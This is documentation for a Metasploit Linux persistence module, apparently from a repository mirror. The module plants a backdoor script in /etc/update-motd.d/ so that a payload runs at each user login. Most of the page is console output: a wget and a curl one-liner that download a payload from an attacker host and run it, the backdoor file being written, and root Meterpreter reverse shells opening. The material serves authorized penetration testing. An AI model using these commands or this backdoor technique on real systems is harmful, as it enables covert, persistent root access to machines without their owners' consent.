adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1e4527d8338b4f431cdc8011c052d3744e29d7ed
metasploit-gs/documentation/modules/exploit/linux/persistence/motd.md
T
h00die e1e4e43535 update motd to persistence mixin
2025-09-09 14:29:29 -04:00

126 lines
5.1 KiB
Markdown
Raw Blame History

## Vulnerable Application
This is a post module that performs a persistence installation on a Linux system using [motd](https://manpages.debian.org/bookworm/manpages/motd.5.en.html).
To trigger the persistence execution, an external event such as a user logging in to the system with SSH is required.
## Verification Steps
1. Start msfconsole
2. Obtain a session on the target machine
3. `use exploit/linux/persistence/motd`
4. `set session [session]`
5. `exploit`
## Options
### BACKDOOR_NAME
Specify the name of the file to insert in the motd directory. Defaults to `99-check-updates`
### PAYLOAD_NAME
Name of the payload file if a `cmd` payload is not used. Defaults to a random name
## Scenarios
### Ubuntu 18.04.3
Initial access vector via web delivery
```
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO oQN8BXNV --no-check-certificate http://111.111.1.111:8181/l; chmod +x oQN8BXNV; ./oQN8BXNV& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:42870) at 2025-02-07 15:40:34 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/tmp) > getuid
Server username: root
(Meterpreter 1)(/tmp) > sysinfo
Computer : ubuntu18desktop.local
OS : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 1)(/tmp) > background
[*] Backgrounding session 1...
```
Persistence
```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/motd
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/motd) > exploit
[-] Msf::OptionValidateError One or more options failed to validate: SESSION.
[msf](Jobs:1 Agents:1) exploit(linux/persistence/motd) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/motd) > exploit
[*] Command to run on remote host: curl -so ./rpNzsXNVDsZ http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./rpNzsXNVDsZ;./rpNzsXNVDsZ&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/motd) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /etc/update-motd.d/ is writable
[*] /etc/update-motd.d/99-check-updates written
[+] Payload will be triggered at user login
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250207.4101/ubuntu18desktop.local_20250207.4101.rc
[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
[*] Sending payload to 222.222.2.222 (curl/7.58.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:48696) at 2025-02-07 15:41:26 -0500
[msf](Jobs:2 Agents:2) exploit(linux/persistence/motd) > sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(/) > getuid
Server username: root
```
### Ubuntu 22.04
```
msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/motd_persistence
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/motd_persistence) > set session -1
session => -1
msf6 exploit(linux/local/motd_persistence) > exploit
[*] /etc/update-motd.d/99-check-updates written
msf6 exploit(linux/local/motd_persistence) >
[*] Sending stage (3045380 bytes) to 172.18.49.39
[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
msf6 exploit(linux/local/motd_persistence) > sessions -i -1
[*] Starting interaction with 2...
meterpreter > getuid
Server username: root
meterpreter >
```
Reference in New Issue View Git Blame Copy Permalink